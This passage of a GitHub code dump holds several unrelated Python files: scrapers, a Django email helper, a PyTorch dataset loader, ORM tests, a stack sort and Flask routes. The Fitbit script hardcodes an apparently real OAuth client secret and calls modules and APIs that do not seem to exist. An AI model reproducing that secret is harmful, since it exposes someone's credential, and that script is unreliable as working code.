selenium.webdriver.chrome.options import Options\nimport pandas as pd \nimport re\nimport glob \nimport shutil \nimport os\n\ndef scrape() : \n #任意のディレクトリを指定\n download_directory = '/Users/soheikurita/Documents/venv/gene2/'\n download_url = 'https://pubchem.ncbi.nlm.nih.gov/gene/'\n gene_csv = pd.read_csv(\"Pubchem_gene_text_covid-19.csv\")\n for i in range(len(gene_csv[\"geneid\"])):\n current_download_directory = download_directory + str(gene_csv[\"geneid\"][i])\n current_download_url = download_url + str(gene_csv[\"geneid\"][i])\n options = webdriver.ChromeOptions()\n #デフォルトダウンロードフォルダを変更する\n options.add_experimental_option(\"prefs\", {\"download.default_directory\": current_download_directory})\n 
#自動テストソフトウェアによって制御されていますというメッセージを非表示にする\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n # 拡張機能の自動更新をさせない(アプリ側の自動アップデートとドライバーの互換性によるエラーを回避)\n options.add_experimental_option('useAutomationExtension', False)\n driver = webdriver.Chrome(\"/Users/soheikurita/Documents/venv/chromedriver\", chrome_options=options)\n try:\n driver.implicitly_wait(10)\n driver.get(current_download_url)\n driver.find_element_by_tag_name('body').click()\n for i in range(1000):\n driver.find_element_by_tag_name('body').send_keys(Keys.PAGE_DOWN)\n time.sleep(10)\n #JAVA SCRIPTの実行\n #ダウンロードボタンを押すために邪魔となっているsticky-barをremoveする\n driver.execute_script(\"document.getElementsByClassName('sticky-bar')[0].remove();\")\n elements = driver.find_elements_by_xpath(\"//button[@data-action='download-section-menu-open']/span\")\n for e in elements:\n e.click()\n save_button = driver.find_elements_by_xpath(\"//span[text()='Save']\")\n save_button[0].click()\n time.sleep(3)\n except:\n traceback.print_exc()\n finally:\n driver.quit()\n\n\ndef mkdir():\n #任意の親ディレクトリに各ファイル用のディレクトリを作成 \n #pdbディレクトリの作成\n l = glob.glob(\"gene2/**/*_pdb*.csv\", recursive = True)\n for i in range(len(l)):\n new_path = shutil.move(l[i], \"pdb\")\n #tested compounds (bioactivity gene)ディレクトリの作成\n l_bio_gene = glob.glob(\"gene2/**/*_bioactivity_gene*.csv\", recursive = True)\n for i in range(len(l_bio_gene)):\n new_path_bio_gene = shutil.move(l_bio_gene[i], \"bioactivity_gene\")\n #drugbank drugsディレクトリの作成\n l_drugbank = glob.glob(\"gene2/**/*_drugbank*.csv\", recursive = True)\n for i in range(len(l_drugbank)):\n new_path_drugbank = shutil.move(l_drugbank[i], \"drugbank\")\n #chembl drugディレクトリの作成\n l_chembl = glob.glob(\"gene2/**/*_chembldrugtargets*.csv\", recursive = True)\n for i in range(len(l_chembl)):\n new_path_chembl = shutil.move(l_chembl[i], \"chembldrug\")\n #guide to pharmacology ligands ディレクトリ\n l_gtopdb = glob.glob(\"gene2/**/*_gtopdb*.csv\", recursive = True)\n for i in range(len(l_gtopdb)):\n new_path_gtopdb = shutil.move(l_gtopdb[i], \"gtopdb\")\n #bioassay ディレクトリ\n l_bioassay = glob.glob(\"gene2/**/*_bioassay*.csv\", recursive = True)\n for i in range(len(l_bioassay)):\n new_path_bioassay = shutil.move(l_bioassay[i], \"bioassay\")\n #ctd gene-disease ディレクトリ\n l_gene_disease = glob.glob(\"gene2/**/*_ctd_gene_disease*.csv\", recursive = True)\n for i in range(len(l_gene_disease)):\n new_path_gene_disease = shutil.move(l_gene_disease[i], \"gene_disease\")\n #gene-gene interaction ディレクトリ\n l_geneinter = glob.glob(\"gene2/**/*_geneinteractions*.csv\", recursive = True)\n for i in range(len(l_geneinter)):\n new_path_geneinter = shutil.move(l_geneinter[i], \"geneinter\")\n #drug-gene interaction ディレクトリ\n l_dgidb = glob.glob(\"gene2/**/*_dgidb*.csv\", recursive = True)\n for i in range(len(l_dgidb)):\n new_path_dgidb = shutil.move(l_dgidb[i], \"dgidb\")\n #ctd chemical-gene interactions ディレクトリ\n l_ctdchemicalgene = glob.glob(\"gene2/**/*_ctdchemicalgene*.csv\", recursive = True)\n for i in range(len(l_ctdchemicalgene)):\n new_path_ctdchemicalgene = shutil.move(l_ctdchemicalgene[i], \"ctdchemicalgene\")\n #pathwayreaction ディレクトリ\n l_pathwayreaction = glob.glob(\"gene2/**/*_pathwayreaction*.csv\", recursive = True)\n for i in range(len(l_pathwayreaction)):\n new_path_pathwayreaction = shutil.move(l_pathwayreaction[i], \"pathwayreaction\")\n #pathwayディレクトリ\n l_pathway = glob.glob(\"gene2/**/*_pathway*.csv\", recursive = True)\n for i in range(len(l_pathway)):\n new_path_pathway = shutil.move(l_pathway[i], 
\"pathwaygene\")\n #RHEAディレクトリ\n l_rhea = glob.glob(\"gene2/**/*_rhea*.csv\", recursive = True)\n for i in range(len(l_rhea)):\n new_path_rhea = shutil.move(l_rhea[i], \"rhea\")\n \n\n\ndef make_csv_for_togo():\n\n #csv内の文字列を分割する必要のあるcolumnsのdict\n columns_dict = {\n 'bioactivity_gene': [],\n \"bioassay\": [\"pmids\"],\n \"chembldrug\":[\"pmids\", \"dois\"],\n \"ctdchemicalgene\":[\"pmids\"],\n \"dgidb\":[\"pmids\", \"dois\"],\n \"drugbank\":[\"pmids\", \"dois\"],\n \"gene_disease\":[\"pmids\", \"dois\"],\n \"gtopdb\":[\"pmids\", \"dois\"],\n \"pathwaygene\":[\"pmids\"],\n \"pathwayreaction\":[\"pmids\"],\n \"pdb\":[\"pmids\", \"dois\"]\n }\n #RDF作成上必要のないcolumnsのdict\n droplist = [[\"aidtype\", \"aidmdate\", \"hasdrc\", \"rnai\", \"acname\", \"acvalue\", \"aidsrcname\", \"cmpdname\", \"ecs\", \"repacxn\"], \\\n [\"aiddesc\", \"aidsrcid\", \"aidsrcname\", \"aidmdate\", \"cids\", \"sids\", \"geneids\", \"aidcategories\", \"protacxns\", \"depcatg\", \"rnai\", \"ecs\", \"repacxns\", \"annotation\"], \\\n [\"srcid\", \"moa\", \"action\"] , \\\n [\"genesymbol\", \"taxname\", \"interaction\"] , \\\n [\"srcid\", \"geneclaimname\", \"interactionclaimsource\", \"interactiontypes\", \"drugclaimname\", \"drugclaimprimaryname\"], \\\n [\"srcid\", \"genesymbol\", \"drugtype\", \"druggroup\", \"drugaction\", \"targettype\", \"targetid\", \"targetcomponent\", \"targetcomponentname\", \"generalfunc\", \"specificfunc\"], \\\n [\"srcid\", \"genesymbol\", \"diseasesrcdb\", \"directevidence\"] , \\\n [\"srcid\", \"ligand\", \"primarytarget\", \"type\", \"action\", \"units\", \"affinity\", \"targetname\", \"targetspecies\", \"genesymbol\"], \\\n [\"pwtype\", \"category\", \"srcid\", \"extid\", \"core\", \"cids\", \"geneids\", \"protacxns\", \"ecs\", \"annotation\"], \\\n [\"cids\", \"geneids\", \"protacxns\", \"ecs\"], \\\n [\"resolution\", \"srcid\", \"expmethod\", \"lignme\", \"cids\", \"protacxns\", \"geneids\"] ]\n\n\n i = 0\n for directory, columns in columns_dict.items():\n #csvファイルは任意のディレクトリに保存\n file_list = glob.glob(f'{directory}/*.csv')\n print(f'Number of files: {len(file_list)}')\n\n for file_name in file_list:\n\n df = pd.read_csv(file_name)\n df = df.drop(droplist[i], axis = 1)\n new_df = pd.DataFrame(columns = df.columns)\n fi = os.path.splitext(os.path.basename(file_name))[0]\n\n for index in tqdm(df.index, desc=file_name):\n data = df.iloc[index].to_dict()\n #一つのセルに|,で区切られた複数のidを分割し、それぞれ新しい行にする\n for data_set in itr.product(*[filter(lambda a: a != '', re.split('[|,]', str(data[column]))) for column in columns]):\n for column, value in zip(columns, data_set):\n data[column] = value\n new_df = new_df.append(data, ignore_index=True)\n \n new_df.to_csv(f'{directory}_s.csv', index=False, mode='a', header=file_name==file_list[0])\n i += 1\n\nif __name__ == \"__main__\": \n scrape()\n mkdir()\n make_csv_for_togo()\n\n\n\n\n\n","repo_name":"Soooheee/glycovid_PubChem","sub_path":"rdf.py","file_name":"rdf.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"21490257317","text":"import os\nimport ds_utils\nimport pandas as pd\nimport numpy as np\nimport datetime\n\nfrom models.mediaalpha.time_of_day.data.queries import hc_session_conversions\nfrom models.utils.time_of_day import get_lowess_spline\n\nfrom api.mediaalpha.mediaalpha_client import MediaAlphaAPIClient\n\ndef main():\n TRAFFIC_SOURCE = 'MEDIAALPHA'\n PRODUCT = 'HEALTH'\n NOW = datetime.datetime.now()\n DAY = datetime.timedelta(days=1)\n\n 
start_date = NOW - 90 * DAY\n end_date = NOW - 0 * DAY\n\n # Get data according to date range\n session_revenue = hc_session_conversions(start_date, end_date, PRODUCT, TRAFFIC_SOURCE)\n \n # Get modifiers\n rev_spline, avg_rev = get_lowess_spline(session_revenue, 'user_ts', 'revenue', show_plots=False)\n modifiers = (rev_spline / avg_rev).tolist()\n\n # Terrible way of making Sunday be last\n modifiers = modifiers[96:] + modifiers[:96]\n\n schedule_payload = []\n temp_day = []\n temp_hour = []\n for day in range(7):\n for hour in range(24):\n temp_day.append(modifiers[(day * 96 + hour * 4):(day * 96 + hour * 4 + 4)])\n schedule_payload.append(temp_day)\n temp_day = []\n\n token = os.getenv(\"MEDIAALPHA_TOKEN\")\n client = MediaAlphaAPIClient(base_url = \"https://insurance-api.mediaalpha.com/220\", token=token)\n client.set_time_of_day_modifiers(schedule_payload, campaign=23898)\n\nif __name__ == '__main__':\n main()\n","repo_name":"pkrishnamurthy1007/adtech","sub_path":"models/mediaalpha/time_of_day/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37555825103","text":"from django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.contrib.auth.models import Group\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.template.loader import render_to_string\nfrom django.core.mail import send_mail\nfrom django.contrib import messages\n\n\n# Account confirmation token gen\nclass AccountActivationTokenGenerator(PasswordResetTokenGenerator):\n def _make_hash_value(self, user, timestamp):\n return f\"{user.pk}{timestamp}{user.email_confirmed}\"\n\n\naccount_activation_token = AccountActivationTokenGenerator()\n\n\n# Emails\ndef send_account_confirmation_email(request, user):\n current_site = get_current_site(request)\n subject = \"Transglobal: New account created!\"\n html_message = render_to_string(\n \"emails/confirmation_email.html\",\n {\n \"user\": user,\n \"domain\": current_site.domain,\n \"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n \"token\": account_activation_token.make_token(user),\n },\n )\n try:\n send_mail(\n subject=subject,\n message=html_message,\n from_email=None,\n recipient_list=[user.email],\n fail_silently=False,\n html_message=html_message,\n )\n user.confirmation_email_sent = True\n user.save()\n messages.success(\n request,\n (\"An email has been sent to the user to complete registration.\"),\n )\n except Exception as e:\n messages.warning(\n request,\n (\"There was an error while delivering the confirmation email to the user.\"),\n )\n\n\n# User groups\ndef auto_assign_groups(\n user, staff_group_name: str = \"Staff\", customer_group_name: str = \"Customer\"\n):\n groups = user.groups.all()\n belongs_to_staff = groups.filter(name=staff_group_name).exists()\n # belongs_to_customer = groups.filter(name=customer_group_name).exists()\n staff_group = Group.objects.get(name=staff_group_name)\n # customer_group = Group.objects.get(name=customer_group_name)\n\n if user.is_staff:\n if not belongs_to_staff:\n user.groups.add(staff_group)\n\n # if belongs_to_customer: # Delete wrong group.\n # self.groups.remove(customer_group)\n elif not user.is_staff: # Delete wrong group.\n if belongs_to_staff:\n user.groups.remove(staff_group)\n\n # if not belongs_to_customer: # It's a new customer.\n # 
self.groups.add(customer_group)\n user.save()\n","repo_name":"sxjugalde/transglobal_vehicule_portal","sub_path":"users/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39945438183","text":"\nimport gather_keys_oauth2 as Oauth2\nimport fitbit\nimport pandas as pd \nimport datetime\n\nCLIENT_ID='2398RL'\nCLIENT_SECRET='00148b3850f9852fe64e5eff7b41d161'\n\nserver=Oauth2.OAuth2Server(CLIENT_ID, CLIENT_SECRET)\nserver.browser_authorize()\nACCESS_TOKEN=str(server.fitbit.client.session.token['access_token'])\nREFRESH_TOKEN=str(server.fitbit.client.session.token['refresh_token'])\nauth2_client=fitbit.Fitbit(CLIENT_ID,CLIENT_SECRET,oauth2=True,access_token=ACCESS_TOKEN,refresh_token=REFRESH_TOKEN)\n\nfrom fitbit import api \nimport appbit \nimport heartrate\nif appbit.permissions.granted(\"access_heart_rate\"): \n hrm = heartrate.HeartRateSensor() \n hrm.start()\n\nfrom accelerometer import Accelerometer\nfrom barometer import Barometer\nfrom heart_rate import HeartRateSensor\nfrom gyroscope import Gyroscope\nfrom orientation import OrientationSensor\n\nprint(\"App Started\")\n\naccel = Accelerometer()\nbar = Barometer()\nhrm = HeartRateSensor()\ngyro = Gyroscope()\norientation = OrientationSensor(frequency=60)\n\naccel.start()\nbar.start()\nhrm.start()\ngyro.start()\norientation.start()\n\ndef refresh_data():\n print(\"accel:\", accel.timestamp,\n \"bar:\", bar.pressure,\n \"hrm:\", hrm.heart_rate,\n \"gyro:\", gyro.timestamp,\n \"orientation\", orientation.timestamp\n )\n\nrefresh_data()\nimport time\nwhile True:\n refresh_data()\n time.sleep(2)\n\n\n\n\n\n\n\n\n\nprint(auth2_client._COLLECTION_RESOURCE('heart', date= datetime.datetime.now()))\ntry:\n import heartrate\n hrm = heartrate.HeartRateSensor(frequency=1)\n def on_reading():\n print(f\"Current heart rate: {hrm.heartRate}\")\n hrm.add_event_listener(\"reading\", on_reading)\n hrm.start()\nexcept ImportError:\n print(\"The heart-rate module is not available.\")\n\n# This is the date of data that I want. 
\n# You will need to modify for the date you want\noneDate = pd.datetime(year = 2023, month = 1, day = 25)\noneDayData = auth2_client.intraday_time_series('activities/heart', oneDate, detail_level='1sec')\n\n# The first part gets a date in a string format of YYYY-MM-DD\nstarttime = pd.datetime(year = 2023, month = 1, day = 24)\nendtime= pd.datetime.today().date() \nimport time\ndate_list = []\ndf_list= []\nallDates = pd.date_range(start=starttime, end=endtime)\n\nfor oneDate in allDates:\n oneDate = oneDate.date().strftime(\"%Y-%m-%d\")\n oneDayDta = auth2_client.intraday_time_series('activities/heart', base_date = '',detail_level='1sec')\n df = pd.DataFrame(oneDayDta['activities-heart-intraday']['dataset'])\n date_list.append(oneDate)\n df_list.append(df)\n\nfinal_df_list=[]\nprint(df_list)\n\n\n##print(df.iloc[-1:])\n\n#time.sleep(5)\n \n # date_list.append(oneDate)\n # df_list.append(df)\n \n#final_df_list = []\n\n#for date, df in zip(date_list, df_list):\n# if len(df)==0:\n# continue\n# df.loc[:, 'date'] = pd.to_datetime(date)\n# final_df_list.append(df)\n#final_df = pd.concat(final_df_list, axis=0)\n\n#print(final_df.tail())","repo_name":"sd1419/GroupProject","sub_path":"SetUp.py","file_name":"SetUp.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41869035572","text":"import torch.utils.data as data\nfrom PIL import Image\nimport os\nimport os.path\nfrom glob import glob\nimport random\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\n\ndef _make_dataset(input_dir,target_dir):\n \"\"\"\n Creates a 2D list of all the frames in N clips containing\n M frames each.\n\n 2D List Structure:\n [[frame00, frame01,...frameM] <-- clip0\n [frame00, frame01,...frameM] <-- clip0\n :\n [frame00, frame01,...frameM]] <-- clipN\n\n Parameters\n ----------\n dir : string\n root directory containing clips.\n\n Returns\n -------\n list\n 2D list described above.\n \"\"\"\n\n\n # framesPath = []\n # # Find and loop over all the clips in root `dir`.\n # count = 0\n # for index, folder in enumerate(os.listdir(input_dir)):\n # BlurryFolderPath = os.path.join(input_dir, folder)\n # SharpFolderPath = os.path.join(target_dir, folder)\n\n # # Skip items which are not folders.\n # if not (os.path.isdir(BlurryFolderPath)):\n # continue\n # BlurryFramePath = sorted(os.listdir(BlurryFolderPath))\n # for frame_index in range(len(BlurryFramePath)):\n # framesPath.append({})\n # framesPath[count]['LQ'] = os.path.join(BlurryFolderPath,BlurryFramePath[frame_index])\n # num_frame_B = int(BlurryFramePath[frame_index].split('.')[0])\n\n # framesPath[count]['HQ'] = os.path.join(SharpFolderPath,\"%06d.png\"%(num_frame_B))\n # count += 1\n # return framesPath\n \n \n framesPath = []\n # Find and loop over all the clips in root `dir`.\n count = 0\n input_img_paths = sorted(glob(os.path.join(input_dir,'*'), recursive=True))\n target_img_paths = sorted(glob(os.path.join(target_dir,'*'), recursive=True))\n assert len(input_img_paths) == len(target_img_paths)\n for index in range(len(input_img_paths)):\n \n framesPath.append({})\n framesPath[count]['input'] = input_img_paths[index]\n framesPath[count]['target'] = target_img_paths[index]\n count += 1\n return framesPath\n\n\ndef _pil_loader(path, cropArea=None, resizeDim=None, frameFlip=0):\n \"\"\"\n Opens image at `path` using pil and applies data augmentation.\n\n Parameters\n ----------\n path : 
string\n path of the image.\n cropArea : tuple, configional\n coordinates for cropping image. Default: None\n resizeDim : tuple, configional\n dimensions for resizing image. Default: None\n frameFlip : int, configional\n Non zero to flip image horizontally. Default: 0\n\n Returns\n -------\n list\n 2D list described above.\n \"\"\"\n\n\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n # Resize image if specified.\n resized_img = img.resize(resizeDim, Image.ANTIALIAS) if (resizeDim != None) else img\n # Crop image if crop area specified.\n cropped_img = resized_img.crop(cropArea) if (cropArea != None) else resized_img\n # Flip image horizontally if specified.\n flipped_img = cropped_img.transpose(Image.FLIP_LEFT_RIGHT) if frameFlip else cropped_img\n return flipped_img.convert('RGB')\n \n \nclass RestoreDataset(data.Dataset):\n \"\"\"\n\n Attributes\n ----------\n framesPath : list\n List of frames' path in the dataset.\n\n Methods\n -------\n __getitem__(index)\n Returns the sample corresponding to `index` from dataset.\n __len__()\n Returns the size of dataset. Invoked as len(datasetObj).\n __repr__()\n Returns printable representation of the dataset object.\n \"\"\"\n\n\n def __init__(self, dataroot, degrade_type=None, patch_size=16, phase='train', data_len=-1):\n self.dataroot = dataroot\n self.degrade_type = degrade_type\n self.patch_size = patch_size\n self.data_len = data_len\n self.phase = phase\n input_dir = os.path.join(dataroot,'input')\n target_dir = os.path.join(dataroot,'target')\n framesPath = _make_dataset(input_dir,target_dir)\n # Raise error if no images found in root.\n self.dataset_len = len(framesPath)\n if self.dataset_len == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: %s\"%(dataroot)))\n \n if self.data_len <= 0:\n self.data_len = self.dataset_len\n else:\n self.data_len = min(self.data_len, self.dataset_len)\n \n self.framesPath = framesPath\n\n if degrade_type:\n if degrade_type == 'blur':\n self.degrade_index = 0\n # elif degrade_type == 'rain':\n # self.degrade_index = 1\n elif degrade_type == 'noise':\n self.degrade_index = 1 \n elif degrade_type == 'lowlight':\n self.degrade_index = 2\n else:\n raise TypeError('degrade type {:s} not found'.format(degrade_type)) \n # mean = [0.5,0.5,0.5]\n # std = [1,1,1]\n # normalize = transforms.Normalize(mean=mean,\n # std = std)\n if phase == 'train':\n # random_crop = transforms.RandomCrop(config['crop_size_X'],config['crop_size_Y'])\n self.transform = transforms.Compose([transforms.ToTensor() ])\n else:\n self.transform = transforms.Compose([transforms.ToTensor()])\n\n def __getitem__(self, index):\n \"\"\"\n Returns the sample corresponding to `index` from dataset.\n\n The sample consists of two reference frames - B1 and B2 -\n and coresponding start and end frame groundtruth B1_S B1_E ... \n\n Parameters\n ----------\n index : int\n Index\n\n Returns\n -------\n tuple\n (sample, returnIndex) where sample is \n [I0, intermediate_frame, I1] and returnIndex is \n the position of `random_intermediate_frame`. 
\n e.g.- `returnIndex` of frame next to I0 would be 0 and\n frame before I1 would be 6.\n \"\"\"\n\n\n sample = {}\n inp_path = self.framesPath[index]['input']\n tar_path = self.framesPath[index]['target']\n inp_img = Image.open(inp_path)\n tar_img = Image.open(tar_path)\n if self.phase == 'train':\n ps = self.patch_size\n ### Data Augmentation ###\n \n w,h = tar_img.size\n padw = ps-w if w 0:\n ps = self.patch_size\n inp_img = TF.center_crop(inp_img, (ps,ps))\n tar_img = TF.center_crop(tar_img, (ps,ps))\n\n inp_img = TF.to_tensor(inp_img)\n tar_img = TF.to_tensor(tar_img)\n \n sample['input'] = inp_img\n sample['target'] = tar_img\n sample['B_path'] = self.framesPath[index]['input']\n sample['index'] = self.degrade_index\n return sample \n\n\n def __len__(self):\n \"\"\"\n Returns the size of dataset. Invoked as len(datasetObj).\n\n Returns\n -------\n int\n number of samples.\n \"\"\"\n\n\n return self.data_len\n\n def __repr__(self):\n \"\"\"\n Returns printable representation of the dataset object.\n\n Returns\n -------\n string\n info.\n \"\"\"\n\n\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.dataroot)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n \n","repo_name":"yjzhang96/Multitask-Restoration","sub_path":"data/dataloader_pair.py","file_name":"dataloader_pair.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19247897447","text":"__author__ = 'jonathan'\n\nimport test.nova._fixtures as models\nfrom lib.rome.core.orm.query import Query\n\nfrom lib.rome.core.orm.query import Query as RomeQuery\nfrom lib.rome.core.session.session import Session as RomeSession\nimport six\n# from oslo.utils import timeutils\nfrom lib.rome.core.utils import timeutils\nfrom test.nova.methods.test_ensure_default_secgroup import _security_group_ensure_default, _security_group_get_query\nfrom sqlalchemy.sql.expression import asc\n\nimport logging\nimport uuid\nfrom lib.rome.core.orm.query import or_\nfrom lib.rome.core.orm.query import and_\nfrom sqlalchemy.sql import null\n\nLOG = logging.getLogger()\n\n# List of fields that can be joined in DB layer.\n_INSTANCE_OPTIONAL_JOINED_FIELDS = ['metadata', 'system_metadata',\n 'info_cache', 'security_groups',\n 'pci_devices']\n# These are fields that are optional but don't translate to db columns\n_INSTANCE_OPTIONAL_NON_COLUMN_FIELDS = ['fault', 'numa_topology',\n 'pci_requests']\n\n# These are fields that can be specified as expected_attrs\nINSTANCE_OPTIONAL_ATTRS = (_INSTANCE_OPTIONAL_JOINED_FIELDS +\n _INSTANCE_OPTIONAL_NON_COLUMN_FIELDS)\n\ndef get_session(use_slave=False, **kwargs):\n # return FakeSession()\n return RomeSession()\n # return OldRomeSession()\n\n\ndef model_query(context, *args, **kwargs):\n # base_model = kwargs[\"base_model\"]\n # models = args\n return RomeQuery(*args, **kwargs)\n\ndef _dict_with_extra_specs(inst_type_query):\n \"\"\"Takes an instance or instance type query returned\n by sqlalchemy and returns it as a dictionary, converting the\n extra_specs entry from a list of dicts:\n 'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]\n to a single dict:\n 'extra_specs' : {'k1': 'v1'}\n \"\"\"\n inst_type_dict = dict(inst_type_query)\n extra_specs = dict([(x['key'], x['value'])\n for x in 
inst_type_query['extra_specs']])\n inst_type_dict['extra_specs'] = extra_specs\n return inst_type_dict\n\ndef _flavor_get_query(context, session=None, read_deleted=None):\n query = model_query(context, models.InstanceTypes, session=session,\n read_deleted=read_deleted)\n if not context.is_admin:\n the_filter = [models.InstanceTypes.is_public == True]\n the_filter.extend([\n models.InstanceTypes.projects.any(project_id=context.project_id)\n ])\n query = query.filter(or_(*the_filter))\n return query\n\ndef flavor_get_by_flavor_id(context, flavor_id, read_deleted):\n \"\"\"Returns a dict describing specific flavor_id.\"\"\"\n result = _flavor_get_query(context, read_deleted=read_deleted).\\\n filter_by(flavorid=flavor_id).\\\n order_by(asc(\"deleted\"), asc(\"id\")).\\\n first()\n if not result:\n raise Exception(\"plop\")\n return _dict_with_extra_specs(result)\n\n\nclass Context(object):\n def __init__(self, project_id, user_id):\n self.project_id = project_id\n self.user_id = user_id\n self.is_admin = True\n\n\nif __name__ == '__main__':\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n context = Context(\"admin\", \"admin\")\n\n # print(flavor_get_by_flavor_id(context, '42', 'no'))\n print(flavor_get_by_flavor_id(context, u'42', 'no'))\n","repo_name":"BeyondTheClouds/rome","sub_path":"test/nova/methods/test_flavor_get_by_flavor_id.py","file_name":"test_flavor_get_by_flavor_id.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"36394223833","text":"from sys import maxsize\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport time\nimport sys\nfrom scipy.interpolate import interp1d\nsys.setrecursionlimit(20000)\nfrom scipy.interpolate import make_interp_spline, BSpline\nclass Stack: \n def __init__(self):\n self.stack = [] #1\n\n def isEmpty(self):\n #global nop\n #nop+=3\n return len(self.stack) == 0 #3\n\n def push(self, item):\n #global nop\n #nop+=2\n return self.stack.append(item) #2\n\n def pop(self):\n #global nop\n #nop+=9\n if self.isEmpty(): #4\n return str(-maxsize - 1) #3\n return self.stack.pop() #2\n\n def peek(self):\n #global nop\n #nop+=9\n if self.isEmpty(): #4\n return self.stack #1\n return self.stack[len(self.stack) - 1] #4\n\n def sort(self):\n #global nop\n #nop+=7\n if self.isEmpty() != True: #4\n x = self.stack.pop() #2\n self.sort()\n self.insert(self.stack, x) #n + n + 6\n return self.stack #1\n\n def insert(self, stack, x):\n #global nop\n if len(stack) > 0: # 2\n #nop+=6\n y = self.stack[-1] #2\n if x < y: #1\n self.stack.pop() #1\n self.insert(self.stack, x)\n self.push(y) #2\n else:\n self.push(x) #2\n\n else:\n #nop+=1\n self.stack.append(x) #1\n\nstack = Stack()\nd = np.random.randint(0, 100, size=25)\n\nfor i in list(d):\n stack.push(i)\n\nprint(stack.stack)\nprint(\"===\")\nprint(stack.sort())\n#Код для вывода графика\n\n\nn = [10,50,100,500,1000,2500,5000,7000,10000]\ndef filler(count):\n d = np.random.randint(0, 100, size=count)\n s = Stack()\n for i in d:\n s.push(i)\n return s\n\ntimey = []\nnop_arr = []\nfor i in n:\n x = filler(i)\n st = time.monotonic()\n x.sort()\n timey.append((time.monotonic() - st))\nplt.figure(figsize=(12, 7))\n\nn = np.array(n)\ntimey = np.array(timey)\n\n\nxnew = np.linspace(n.min(), n.max(), 300) \nspl = make_interp_spline(n, timey, k=3) # type: BSpline\npower_smooth = spl(xnew)\nplt.grid(True)\nplt.plot(xnew, power_smooth, label=\"dependence\")\nplt.title(\"Т(n)\")\nplt.xlabel(\"Array 
size\")\nplt.ylabel(\"milliseconds \")\nplt.legend()\nplt.show()\n\n\n","repo_name":"GlamorousCar/mirea_edu","sub_path":"laba1.py","file_name":"laba1.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20473001460","text":"from flask import current_app as app\nfrom flask import render_template, redirect, url_for, request, abort\nfrom flask_login import current_user, login_required\nfrom flask_breadcrumbs import register_breadcrumb\nfrom sqlalchemy import desc\n\nfrom app import db\nfrom app.blueprints.problems import problems\nfrom app.models import Grade, Topic, Submission\nfrom app.contester.languages import languages\nfrom app.utils.routes import grade_compliance_required, admin_required\nfrom app.utils.db import get_task\nimport app.utils.breadcrumbs as bc\n\n\n@problems.route('/redirect', methods=['GET'])\n@login_required\ndef redirect_page():\n if current_user.is_admin:\n return redirect(url_for('problems.all_grades_page'))\n return redirect(url_for('problems.grade_page', grade_number=current_user.grade.number))\n\n\n@problems.route('/', methods=['GET'])\n@login_required\n@admin_required\ndef all_grades_page():\n return render_template('problems/all_grades.html', title='Все классы', grades=db.session.query(Grade).all())\n\n\n@problems.route('/grade-', methods=['GET'])\n@register_breadcrumb(problems, '.grade', '', dynamic_list_constructor=bc.view_grade_dlc)\n@login_required\n@grade_compliance_required\ndef grade_page(grade_number):\n grade = db.session.query(Grade).filter(Grade.number == grade_number).first_or_404()\n topics = grade.topics.all()\n\n context = {\n 'grade': grade,\n 'topics': topics,\n }\n\n return render_template('problems/grade.html', title=f'{grade.number} класс', **context)\n\n\n@problems.route('/grade-/', methods=['GET'])\n@register_breadcrumb(problems, '.grade.topic', '', dynamic_list_constructor=bc.view_topic_dlc)\n@login_required\n@grade_compliance_required\ndef topic_page(grade_number, topic_translit_name):\n grade = db.session.query(Grade).filter(Grade.number == grade_number).first_or_404()\n topic = db.session.query(Topic).filter(Topic.translit_name == topic_translit_name).first_or_404()\n tasks = topic.tasks.all()\n print(tasks)\n\n context = {\n 'grade': grade,\n 'topic': topic,\n 'tasks': tasks\n }\n return render_template('problems/topic.html', title=topic.name, **context)\n\n\n@problems.route(\n '/grade-//',\n defaults={'tab': 'problem'},\n methods=['GET']\n)\n@problems.route(\n '/grade-///',\n methods=['GET']\n)\n@register_breadcrumb(problems, '.grade.topic.task', '', dynamic_list_constructor=bc.view_task_dlc)\n@login_required\n@grade_compliance_required\ndef task_page(grade_number, topic_translit_name, task_translit_name, tab):\n task = get_task(grade_number, topic_translit_name, task_translit_name)\n topic = task.topic\n\n global_context = {\n 'task': task,\n 'topic': topic,\n }\n\n page = request.args.get('table_page', type=int, default=1)\n\n if tab == 'problem':\n # Tab with problem (name, condition, editor etc)\n local_context = {\n 'language_dict': languages.dictionary\n }\n return render_template(\n 'problems/tabs/problem.html',\n title=f'{task.name} - Задача',\n **global_context,\n **local_context\n )\n\n elif tab == 'submissions':\n # Tab with user's 